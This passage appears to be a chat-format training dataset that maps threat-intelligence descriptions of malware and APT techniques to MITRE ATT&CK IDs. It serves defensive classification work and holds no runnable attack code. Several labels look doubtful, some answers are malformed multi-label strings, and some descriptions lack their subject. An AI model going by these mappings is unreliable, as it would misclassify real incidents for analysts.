"content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The domain fabianiarte.com (fabianiarte.it) was compromised to host backend server code and malicious DOTM files. This domain hosted DOTM files that were used to mimic defense contractors’ job profiles as observed in Operation North Star, but the domain also included some rudimentary backend server code that we suspect was used by the implant. According to our analysis of this cache of data this site was compromised to host code on 7/9/2020" }, { "role": "assistant", "content": "T1584.001 - Domains" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "IronNetInjector has used a task XML file named \"mssch.xml\" to run an IronPython script when a user logs in or when specific system events are created." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Smoke Loader not only installs its original sample but also replaces it with a fresh version, which is downloaded from the C&C – path: http://<CnC address>/system32.exe. This trick makes detection more difficult – updated samples are repacked by a different crypter, may also have their set of C&Cs changed" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly used remote access services, including VPN and Outlook Web Access (OWA)." }, { "role": "assistant", "content": "T1133 - External Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PowerLess is written in and executed via PowerShell without using powershell.exe." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Donut includes a subproject \"DonutTest\" to inject shellcode into a target process." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BADNEWS installs a registry Run key to establish persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Zeus Panda checks processes on the system and if they meet the necessary requirements, it injects into that process." }, { "role": "assistant", "content": "T1055.002 - Process Injection: Portable Executable Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bazar can download and deploy additional payloads, including ransomware and post-exploitation frameworks such as Cobalt Strike." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BITTER has used scheduled tasks for persistence and execution." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sidewinder has used tools to identify running processes on the victim's machine." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "By enabling this data connection, the user allows Excel to obtain content from the URL in the .iqy file. The contents within the releasenotes.txt file (SHA256: bf925f340920111b385078f3785f486fff1096fd0847b993892ff1ee3580fa9d) contains the following formula that Excel will save to the “A0” cell in the worksheet" }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "P8RAT can download additional payloads to a target system." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OnionDuke steals credentials from its victims." }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Tarrask is able to create “hidden” scheduled tasks for persistence." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NOKKI can delete files to cover tracks." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has a command to obtain a directory listing." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SILENTTRINITY can conduct an image hijack of an `.msc` file extension as part of its UAC bypass process." }, { "role": "assistant", "content": "T1546.001 - Event Triggered Execution: Change Default File Association" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "When entered, these credentials are then sent to the C2 server, which allows DarkHydrus to collect the user account credentials" }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "STARWHALE has stored collected data in a file called `stari.txt`." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bazar can use Nltest tools to obtain information about the domain." }, { "role": "assistant", "content": "T1482 - Domain Trust Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Doki was executed through an open Docker daemon API port." }, { "role": "assistant", "content": "T1133 - External Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "zwShell has deleted itself after creating a service as well as deleted a temporary file when the system reboots." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The document contains an encoded Visual Basic Script (VBScript) typical of previous Carbanak malware. Recent samples of the malware have now included the ability to use Google services for command-and-control (C&C) communication. The module is base64 encoded inside the main VBScript file along with various other VBScript modules used by the malware. When we analyzed the script we noticed that it is capable of using Google services as a C&C channel. Abusing Google for C&C communication . The \"ggldr\" script will send and receive commands to and from Google Apps Script, Google Sheets, and Google Forms services. It is unlikely that these hosted Google services are blocked by default in an organization, so it is more likely that the attacker will establish a C&C channel successfully. Upon the first attempt to contact the hard-coded Google Apps Script URL with the user's unique infection ID, the C&C will state that no spreadsheet currently exists for the user. The malware will then send two requests to another hard-coded Google Forms URL which will result in the creation of unique Google Sheets spreadsheet and Google Form IDs for the victim. The second time the Google Apps Script is requested, the C&C will return the unique Google Sheet and Google Form ID values: The \"entry\" value is also a unique ID which is sent with each subsequent Google Forms C&C request. Using Google as an independent C&C channel is likely to be more successful than using newly created domains or domains with no reputation" }, { "role": "assistant", "content": "T1102.002 - Bidirectional Communication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NotPetya determines if specific antivirus programs are running on an infected host machine." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "All of the backdoors identified - excluding RoyalDNS - required APT15 to create batch scripts in order to install its persistence mechanism" }, { "role": "assistant", "content": "T1064 - Scripting', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The observed attack technique (OAT) detection indicates that the php-cgi process represents a “/bin/bash” shell”and is directly reading “passwd”, suggesting that the server might have been compromised" }, { "role": "assistant", "content": "T1059.004 - Command and Scripting Interpreter: Bash" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Denis queries the Registry for keys and values." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Caterpillar WebShell can gather a list of processes running on the machine." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A file stealer can run a TaskScheduler DLL to add persistence." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Emissary has the capability to execute the command \"net start\" to interact with services." }, { "role": "assistant", "content": "T1007 - System Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sandworm Team has used a large-scale botnet to target Small Office/Home Office (SOHO) network devices." }, { "role": "assistant", "content": "T1584.005 - Botnet" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Modify the shortcut that launches Telegram by replacing its path to the one corresponding to ‘exe’, as outlined below" }, { "role": "assistant", "content": "T1518 - Software Discovery', 'T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoshC2 contains a module for exploiting SMB via EternalBlue." }, { "role": "assistant", "content": "T1210 - Exploitation of Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT15 was also observed using Mimikatz to dump credentials and generate Kerberos golden tickets" }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The original Microsoft Excel spreadsheet is copied into the %TEMP% directory - The embedded object “xl\\embeddings\\oleObject1[.]bin” inside the Microsoft Excel spreadsheet is copied into the %TEMP% directory - The DLL inside oleObject1.bin is extracted and copied into %APPDATA% by the “ReadAndWriteExtractedBinFile” function - The DLL is loaded with LoadLibraryA - The DLL’s exported function, such as “Get2”, is run by the macro" }, { "role": "assistant", "content": "T1055.001 - Process Injection: Dynamic-link Library Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Much like the previous version of Reaver, Reaver.v3 will query the necessary registry keys to determine the correct startup path to use" }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RTM has initiated connections to external domains using HTTPS." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "XCSSET attempts to discover accounts from various locations such as a user's Evernote, AppleID, Telegram, Skype, and WeChat data." }, { "role": "assistant", "content": "T1087 - Account Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has a command to download a file." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once the attacker gained access to the network with compromised credentials, they moved laterally using multiple different credentials. The credentials used for lateral movement were always different from those used for remote access" }, { "role": "assistant", "content": "T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Adversaries can instruct Duqu to spread laterally by copying itself to shares it has enumerated and for which it has obtained legitimate credentials (via keylogging or other means). The remote host is then infected by using the compromised credentials to schedule a task on remote machines that executes the malware." }, { "role": "assistant", "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares', 'T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can delete all Registry entries created during its execution." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "To facilitate the staging of BEACON on remote systems APT29 utilized a malicious certificate that allowed the group to impersonate a privileged user." }, { "role": "assistant", "content": "T1588.004 - Digital Certificates" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Donut can patch Antimalware Scan Interface (AMSI), Windows Lockdown Policy (WLDP), as well as exit-related Native API functions to avoid process termination." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RemoteCMD can execute commands remotely by creating a new schedule task on the remote system" }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Upon execution, the malware first decrypts its C2 IP address using a xor-incremental encryption and then creates a mutant, using its C2 IP address as the mutant’s name" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Naikon has convinced victims to open malicious attachments to execute malware." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Doki has searched for the current process’s PID." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT3 has used a keylogging tool that records keystrokes in encrypted files." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ObliqueRAT can gain persistence by a creating a shortcut in the infected user's Startup directory." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ShimRat has the capability to upload collected files to a C2." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Amadey has checked for a variety of antivirus products." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This spyware registers itself as a system service to ensure its automatic execution at every system startup by adding the following registry entries" }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The \"net start\" and \"net stop\" commands can be used in Net to execute or stop Windows services." }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation CuckooBees, the threat actors executed an encoded VBScript file." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It also moves the JS file to ‘Shell.NameSpace(28)’ (‘ssfLOCALAPPDATA’ – ‘\\AppData\\Local’) and creates a scheduled task to use WScript to execute the file at every user log on. The installation routine then copies the keylogger to the registry, sets the uid + 0 flag to 1 to indicate that installation was completed, and executes the scheduled task it created" }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The initial infection vector of this campaign is a Microsoft Office Excel Worksheet with an Office macro that uses the mshta.exe Windows executable to run scripts, which are embedded in the HTML of a specially-crafted blogspot.com page. The page, 29[.]html, contains two distinct sections of scripts. The scripts create scheduled tasks and also retrieve, decode, and execute a copy of Revenge RAT" }, { "role": "assistant", "content": "T1218.005 - Signed Binary Proxy Execution: Mshta" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KARAE was distributed through torrent file-sharing websites to South Korean victims, using a YouTube video downloader application as a lure." }, { "role": "assistant", "content": "T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The purpose of this malware is to perform destruction of the host, leave the computer system offline, and wipe remote data. Additionally, the destroyer disables all the services on the system: The malware uses the ChangeServiceConfigW API to change the start type to 4 which means: \"Disabled: Specifies that the service should not be started" }, { "role": "assistant", "content": "T1529 - System Shutdown/Reboot" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Another difference in the network traffic generated from the malware is that the encoded proxy information has been added in the URL query values during the C2 communication" }, { "role": "assistant", "content": "T1132 - Data Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Since the FoggyWeb loader version.dll is an unmanaged application, it cannot directly access the virtual runtime environment that the managed AD FS code is executed within. The loader overcomes this limitation and loads the backdoor alongside the AD FS code by leveraging the CLR hosting interfaces and APIs to access the virtual runtime environment within which the AD FS code is executed" }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT38 clears Window Event logs and Sysmon logs from the system." }, { "role": "assistant", "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used a Registry Run key to establish persistence by executing JavaScript code within the rundll32.exe process." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Remsec is capable of using ICMP, TCP, and UDP for C2." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Maze has inserted large blocks of junk code, including some components to decrypt strings and other important information for later in the encryption process." }, { "role": "assistant", "content": "T1027.001 - Obfuscated Files or Information: Binary Padding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The decompressed PowerShell payload has some similarities to the PowerShell Empire agent, such as the use of a jitter value and commands referred to by job ID, but we do not have conclusive evidence that the author of this tool used Empire as a basis for their tool" }, { "role": "assistant", "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can download files from the C2 server to the victim’s machine." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Turla has developed its own unique malware for use in operations." }, { "role": "assistant", "content": "T1587.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "More specifically, Ramsay looks for any of two given encoded Hardware Profile GUIDs. One of these GUIDs is hardcoded as shown in Figure 14, while the other is dynamically generated based on the compromised victim’s machine. If any of the subject identifiers are found, parsing for a command signature will be attempted" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "XCSSET uses a shell script to execute Mach-o files and \"osacompile\" commands such as, \"osacompile -x -o xcode.app main.applescript\"." }, { "role": "assistant", "content": "T1059.004 - Command and Scripting Interpreter: Bash" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HELLOKITTY can enumerate logical drives on a target system." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bazar can query \"Windows\\CurrentVersion\\Uninstall\" for installed applications." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Squirrelwaffle can collect the user name from a compromised host." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It is able to steal autofill information from web browsers, cookies, saved credit cards, browser history, coin wallets and Telegram databases. " }, { "role": "assistant", "content": "T1185 - Browser Session Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The APT1 group is known to have used RDP during operations." }, { "role": "assistant", "content": "T1021.001 - Remote Services: Remote Desktop Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CookieMiner issues a series of commands to configure the victim’s machine to mine cryptocurrency and maintain persistence (Figure 6). The program xmrig2 is a Mach-O executable for mining cryptocurrency. As seen in Figure 7, the address “k1GqvkK7QYEfMj3JPHieBo1m7FUkTowdq6H” has considerable mining performance. It has been ranked as a top miner in the Maruru mining pool (koto-pool.work).­­­ The cryptocurrency mined is called Koto, which is a Zcash-based anonymous cryptocurrency. The has addresses in Figure 8 use the “Yescrypt” algorithm which is good for CPU miners but not ideal for GPU miners. This is ideal for malware as the victim hosts are not guaranteed to have discrete GPUs installed in them but are guaranteed to have a CPU available. We believe the malware authors may have intentionally used this filename to create confusion since the miner is actually mining the Koto cryptocurrency" }, { "role": "assistant", "content": "T1543.001 - Create or Modify System Process: Launch Agent" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Honeybee, the threat actors uses zip to pack collected files before exfiltration." }, { "role": "assistant", "content": "T1560.001 - Archive Collected Data: Archive via Utility" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pony has sent collected information to the C2 via HTTP POST request." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Their next move was to list any remote shared drives and then attempt to access remote shares owned by the specific government office they were targeting, again attempting to extract all Word documents" }, { "role": "assistant", "content": "T1135 - Network Share Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OilRig uses remote services such as VPN, Citrix, or OWA to persist in an environment." }, { "role": "assistant", "content": "T1133 - External Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "copies files from removable drives to C:\\system." }, { "role": "assistant", "content": "T1074 - Data Staged" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "performs timestomping of a CAB file it creates." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an 